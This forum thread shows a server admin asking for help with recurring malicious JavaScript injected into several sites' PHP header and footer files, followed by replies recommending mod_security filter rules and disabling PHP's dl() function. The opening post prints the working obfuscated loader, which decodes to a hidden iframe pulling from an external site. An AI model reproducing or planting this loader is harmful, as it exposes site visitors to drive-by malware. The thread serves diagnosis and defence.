Recurring PHP malicious document.write exploit

[mousepotatoe]

On my server, several sites but not all sites are having this code inserted into php pages, mainly index.php header.php or footer.php

I cannot locate the source of this exploit.

Is anyone familiar with this? code follows

Code:

<script language=javascript>
document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%73%65%6C%66%2E%66%6F%63%75%73%28%29%3B%73%65%74%49%6E%74%65%72%76%61%6C%28%22%77%69%6E%64%6F%77%2E%73%74%61%74%75%73%3D%27%47%6F%6F%67%6C%65%2E%63%6F%6D%27%22%2C%37%29%3B%7D%3C%2F%73%63%72%69%70%74%3E%0D%0A'));dF('%286FLIUDPH%2853%2853vuf%286G%2855kwws%286D22zzz1vn%7Cv1frp2nlso1sks%2855%2853zlgwk%286G5%2853khljkw%286G5%2853vw%7Coh%286G%2855glvsod%7C%286Dqrqh%2855%286H%286F2LIUDPH%286H3')
</script>

any help would be greatly appreciated

[HostMerit]

Id suggest mod_security, and my mod security ruleset that contains things to block such as this - http://www.hostmerit.com/modsec.user.conf


To block those with modsec,
SecFilter "document\.write"
SecFilterSelective THE_REQUEST "<script>"

My script contains around 30+ Javascript + XML cross site scripting code blocks.

[DigitalN]

Mod security will block the requests that you filter, but the real issue is probably that the mailicious php module is still being loaded via the dl() function.

Just edit your php.ini file and change

enable_dl = yes

to
enable_dl = no

And restart apache - the problem won't reoccur then.

[jamesbond]

enable_dl = yes

to
enable_dl = no

And restart apache - the problem won't reoccur then.

Shouldn't it be:

enable_dl = On
enable_dl = Off

[mousepotatoe]

Id suggest mod_security, and my mod security ruleset that contains things to block such as this - http://www.hostmerit.com/modsec.user.conf


To block those with modsec,
SecFilter "document\.write"
SecFilterSelective THE_REQUEST "<script>"

My script contains around 30+ Javascript + XML cross site scripting code blocks.

Thats a wonderful mod_security ruleset, and thank you for writing the lines:

SecFilter "document\.write"
SecFilterSelective THE_REQUEST "<script>"

I have added this to my modsec ruleset, but the malicious code is creating
"<script language=javascript>"

would this mod_security recognize <script language=javascript> as <script> ?

Thanks!

[mousepotatoe]

Mod security will block the requests that you filter, but the real issue is probably that the mailicious php module is still being loaded via the dl() function.

Just edit your php.ini file and change

enable_dl = yes

to
enable_dl = no

And restart apache - the problem won't reoccur then.

If i change enable_dl = no all my ioncube sites go down, will not allow ioncube to load any of my ioncube encrypted sites. Is there a workaround for this?

Thank you!

[Etheral]

Thats a wonderful mod_security ruleset, and thank you for writing the lines:

SecFilter "document\.write"
SecFilterSelective THE_REQUEST "<script>"

I have added this to my modsec ruleset, but the malicious code is creating
"<script language=javascript>"

would this mod_security recognize <script language=javascript> as <script> ?

Thanks!

you might NOT want to block javascript like that, some people use javascript to give there website a more interactive feel...

[tolra]

If i change enable_dl = no all my ioncube sites go down, will not allow ioncube to load any of my ioncube encrypted sites. Is there a workaround for this?

Thank you!

You can load the ioncube loaders within php.ini see the bottom of http://www.ioncube.com/loader_installation.php under "Manual Installation in the php.ini File", then you can disable dl.

[HostMerit]

you might NOT want to block javascript like that, some people use javascript to give there website a more interactive feel...

You have no idea what you're talking about. I suggest you find out what mod_security is, and why the comment you made makes no sense. It blocks URL requests, not page code.

[DigitalN]

Yes,

enable_dl = Off

Is what you want - I was working from memory, it's as simple as that to disable this exploit.

Enabling dl() makes your server vulnerable to any account loading a rogue mdule into php - load ioncube and any other legitimate modules (such as sourceguardian) into php.ini yourself, as someone mentioned.

[mousepotatoe]

Disabling the dl() function is wreaking havoc on many of my websites. I had to load ioncube into the php.ini and got past that, and have added source guardian to php.ini but am getting the following error.

One or more errors are fatal due to the fact that they disable the ability to load the Source Guardian loader:
Your system has the "dl()" function diabled.
This error is fatal and will prevent you from using this plugin. To access the rest of your plugins remove this plugin from your server.

I have tried

[Zend]
extension=/home/ixed/ixed.4.4.lin
zend_extension = /home/ioncube/ioncube_loader_lin_4.4.so
zend_optimizer.optimization_level=15
zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-2_6_2
zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-2_6_2
zend_optimizer.version=2.6.2

and

extension=/home/ixed/ixed.4.4.lin
[Zend]
zend_extension = /home/ioncube/ioncube_loader_lin_4.4.so
zend_optimizer.optimization_level=15
zend_extension_manager.optimizer=/usr/local/Zend/lib/Optimizer-2_6_2
zend_extension_manager.optimizer_ts=/usr/local/Zend/lib/Optimizer_TS-2_6_2
zend_optimizer.version=2.6.2

with no luck.
Any suggestions?

Thank you